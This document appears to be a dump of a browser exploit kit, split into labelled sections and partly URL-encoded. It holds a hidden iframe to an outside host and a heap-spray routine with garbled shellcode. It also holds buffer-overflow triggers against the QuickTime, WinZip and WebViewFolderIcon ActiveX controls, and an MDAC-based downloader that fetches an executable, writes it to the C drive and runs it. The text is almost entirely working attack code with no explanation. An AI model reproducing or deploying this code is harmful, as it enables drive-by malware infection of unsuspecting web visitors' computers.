%09%76%5b%31%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%41%44%4f%44%42%2e%53%74%72%65%61%6d%22%29%3b%0a%09%09%09%7d%0a%0a%09%09%09%69%66%20%28%21%20%76%5b%32%5d%29%20%7b%0a%09%09%09%09%76%5b%32%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%57%53%63%72%69%70%74%2e%53%68%65%6c%6c%22%29%3b%0a%09%09%09%09%69%66%20%28%21%20%76%5b%32%5d%29%20%7b%0a%09%09%09%09%09%76%5b%32%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%53%68%65%6c%6c%2e%41%70%70%6c%69%63%61%74%69%6f%6e%22%29%3b%0a%09%09%09%09%09%69%66%20%28%76%5b%32%5d%29%20%6e%3d%31%3b%0a%09%09%09%09%7d%0a%09%09%09%7d%0a%09%09%7d%0a%0a%09%09%69%2b%2b%3b%0a%09%7d%0a%0a%09%69%66%20%28%76%5b%30%5d%20%26%26%20%76%5b%31%5d%20%26%26%20%76%5b%32%5d%29%20%7b%0a%09%09%76%61%72%20%64%61%74%61%20%3d%20%58%4d%4c%48%74%74%70%44%6f%77%6e%6c%6f%61%64%28%76%5b%30%5d%2c%20%75%72%6c%52%65%61%6c%45%78%65%29%3b%0a%09%09%69%66%20%28%64%61%74%61%20%21%3d%20%30%29%20%7b%0a%09%09%09%76%61%72%20%6e%61%6d%65%20%3d%20%22%63%3a%5c%5c%73%79%73%22%2b%47%65%74%52%61%6e%64%53%74%72%69%6e%67%28%34%29%2b%22%2e%65%78%65%22%3b%0a%09%09%09%69%66%20%28%41%44%4f%42%44%53%74%72%65%61%6d%53%61%76%65%28%76%5b%31%5d%2c%20%6e%61%6d%65%2c%20%64%61%74%61%29%20%3d%3d%20%31%29%20%7b%0a%09%09%09%09%69%66%20%28%53%68%65%6c%6c%45%78%65%63%75%74%65%28%76%5b%32%5d%2c%20%6e%61%6d%65%2c%20%6e%29%20%3d%3d%20%31%29%20%7b%0a%09%09%09%09%09%72%65%74%3d%31%3b%0a%09%09%09%09%7d%0a%09%09%09%7d%0a%09%09%7d%0a%09%7d%0a%0a%09%72%65%74%75%72%6e%20%72%65%74%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%28%29%20%7b%0a%0a%09%69%66%20%28%21%20%4d%44%41%43%28%29%20%29%20%7b%20%73%74%61%72%74%4f%76%65%72%66%6c%6f%77%28%30%29%3b%20%7d%0a%0a%7d%0a%0a%73%74%61%72%74%20%28%29%3b%0a%0a%3c%2f%73%63%72%69%70%74%3e%0a%3c%2f%62%6f%64%79%3e%0a%3c%2f%68%74%6d%6c%3e%0a%0a%0a');
 

document.write (SB);

[BXKRF] 



.0x03:[SB]

<html> 
<body> 
<div id="mydiv"></div> 
<iframe style='display:none' width=1 height=1 src='http://foo.address1.com/bar/'></iframe> 

<script language="JavaScript"> 

var memory = new Array(); 
var mem_flag = 0; 

function having() { memory=memory; setTimeout("having()", 2000); } 

function getSpraySlide(spraySlide, spraySlideSize) 
{ 
   while (spraySlide.length*2<spraySlideSize) 
   {spraySlide += spraySlide;} 

   spraySlide = spraySlide.substring(0,spraySlideSize/2); 
   return spraySlide; 
} 

function makeSlide() 
{ 
   var heapSprayToAddress = 0x0c0c0c0c; 
   var payLoadCode = unescape("????????" + 
"????????????????" + 
"????????????????" + 
"???????????????" + 
"????????????????" + 
"????????????????" + 
"????????????????" + 
"????????????????" + 
"????????????????" + 
"'???????????????" + 
"????????????????" + 
"????????q??e????" + 
"????????????????" + 
"?????" +

[SB]   



.0x04:[PayLoadCode]

???????? 
??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? 
'???????????????????????????????????????q??e?????????????????????????

[PayLoadCode]



.0x05:[MR2 var]

); 
   var heapBlockSize = 0x400000; 
   var payLoadSize = payLoadCode.length * 2; 
   var spraySlideSize = heapBlockSize - (payLoadSize+0x38); 
   var spraySlide = unescape("??"); 
   spraySlide = getSpraySlide(spraySlide,spraySlideSize); 
   heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;    
   for (i=0;i<heapBlocks;i++) 
   { 
      memory[i] = spraySlide + payLoadCode; 
   } 
   mem_flag = 1; 
   having(); 
   return memory; 
} 

function startWVF() 
{ 
   for (i=0;i<128;i++) 
   { 
      try{ 
         var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1'); 
         tar.setSlice(0x7ffffffe, 0x0c0c0c0c, 0x0c0c0c0c,0x0c0c0c0c ); 
      }catch(e){} 
   } 
} 

function startWinZip(object) 
{ 
   var xh = 'A'; 
   while (xh.length < 231) xh+='A'; 
   xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c"; 
   object.CreateNewFolderFromName(xh); 
} 

function startOverflow(num) 
{ 
   if (num == 0) { 
      try { 
         var qt = new ActiveXObject('QuickTime.QuickTime');       
         if (qt) { 
            var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+ 
            '<param name="src" value="http://address2.com/tXlwpKDL/uCfIXrUcVpycMkVj.qtl">'+ 
            '<param name="autoplay" value="true">'+ 
            '<param name="loop" value="false">'+ 
            '<param name="controller" value="true">'+ 
            '</object>'; 
            if (! mem_flag) makeSlide(); 
            document.getElementById('mydiv').innerHTML = qthtml; 
            num = 255; 
         } 
      } catch(e) { } 

      if (num = 255) setTimeout("startOverflow(1)", 2000); 
      else startOverflow(1); 
   } else if (num == 1) { 
      try { 
         var winzip = document.createElement("object"); 
         winzip.setAttribute("classid", "clsid:A09AE68F-B14D-43ED-B713-BA413F034904"); 

         var ret=winzip.CreateNewFolderFromName(unescape("%00")); 
         if (ret == false) { 
            if (! mem_flag) makeSlide(); 
            startWinZip(winzip); 
            num = 255; 
         } 

      } catch(e) { } 

      if (num = 255) setTimeout("startOverflow(2)", 2000); 
      else startOverflow(2); 
   } else if (num == 2) { 

      try { 
         var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1'); 
         if (tar) { 
            if (! mem_flag) makeSlide(); 
            startWVF(); 
         } 
      } catch(e) { } 
   } 
} 

function GetRandString(len) 
{ 
   var chars = "abcdefghiklmnopqrstuvwxyz"; 
   var string_length = len; 
   var randomstring = ''; 
   for (var i=0; i<string_length; i++) { 
      var rnum = Math.floor(Math.random() * chars.length); 
      randomstring += chars.substring(rnum,rnum+1); 
   } 
   return randomstring; 
} 

function CreateObject(CLSID, name) { 
   var r = null; 
   try { eval('r = CLSID.CreateObject(name)') }catch(e){}    
   if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} } 
   if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} } 
   if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} } 
   if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} } 
   if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} } 
   return(r); 
} 

function XMLHttpDownload(xml, url) { 
   try { 
      xml.open("GET", url, false); 
      xml.send(null); 
   } catch(e) { return 0; } 
   return xml.responseBody; 
} 

function ADOBDStreamSave(o, name, data) { 
   try { 
      o.Type = 1; 
      o.Mode = 3; 
      o.Open(); 
      o.Write(data); 
      o.SaveToFile(name, 2); 
      o.Close(); 
   } catch(e) { return 0; } 
   return 1; 
} 

function ShellExecute(exec, name, type) { 
   if (type == 0) { 
      try { exec.Run(name, 0); return 1; } catch(e) { } 
   } else { 
      try { exe.ShellExecute(name); return 1; } catch(e) { } 
   } 
   return(0); 

} 
function MDAC() { 
   var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null); 
   var v = new Array(null, null, null); 
   var i = 0; 
   var n = 0; 
   var ret = 0; 
   var urlRealExe =

[MR2]   



.0x06:[MU2]; 

   while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) { 
      var a = null; 
      try { 
         a = document.createElement("object"); 
         a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1)); 
      } catch(e) { a = null; } 
      if (a) { 
         if (! v[0]) { 
            v[0] = CreateObject(a, "msxml2.XMLHTTP"); 
            if (! v[0]) v[0] = CreateObject(a, "Microsoft.XMLHTTP"); 
            if (! v[0]) v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP"); 
         } 
         if (! v[1]) { 
            v[1] = CreateObject(a, "ADODB.Stream"); 
         } 
         if (! v[2]) { 
            v[2] = CreateObject(a, "WScript.Shell"); 
            if (! v[2]) { 
               v[2] = CreateObject(a, "Shell.Application"); 
               if (v[2]) n=1; 
            } 
         } 
      } 
      i++; 
   } 

   if (v[0] && v[1] && v[2]) { 
      var data = XMLHttpDownload(v[0], urlRealExe); 
      if (data != 0) { 
         var name = "c:\\sys"+GetRandString(4)+".exe"; 
         if (ADOBDStreamSave(v[1], name, data) == 1) { 
            if (ShellExecute(v[2], name, n) == 1) { 
               ret=1; 
            } 
         } 
      } 
   } 
   return ret; 
} 
function start() { 
   if (! MDAC() ) { startOverflow(0); } 
} 
start (); 
</script> 
</body> 
</html>

[MU2]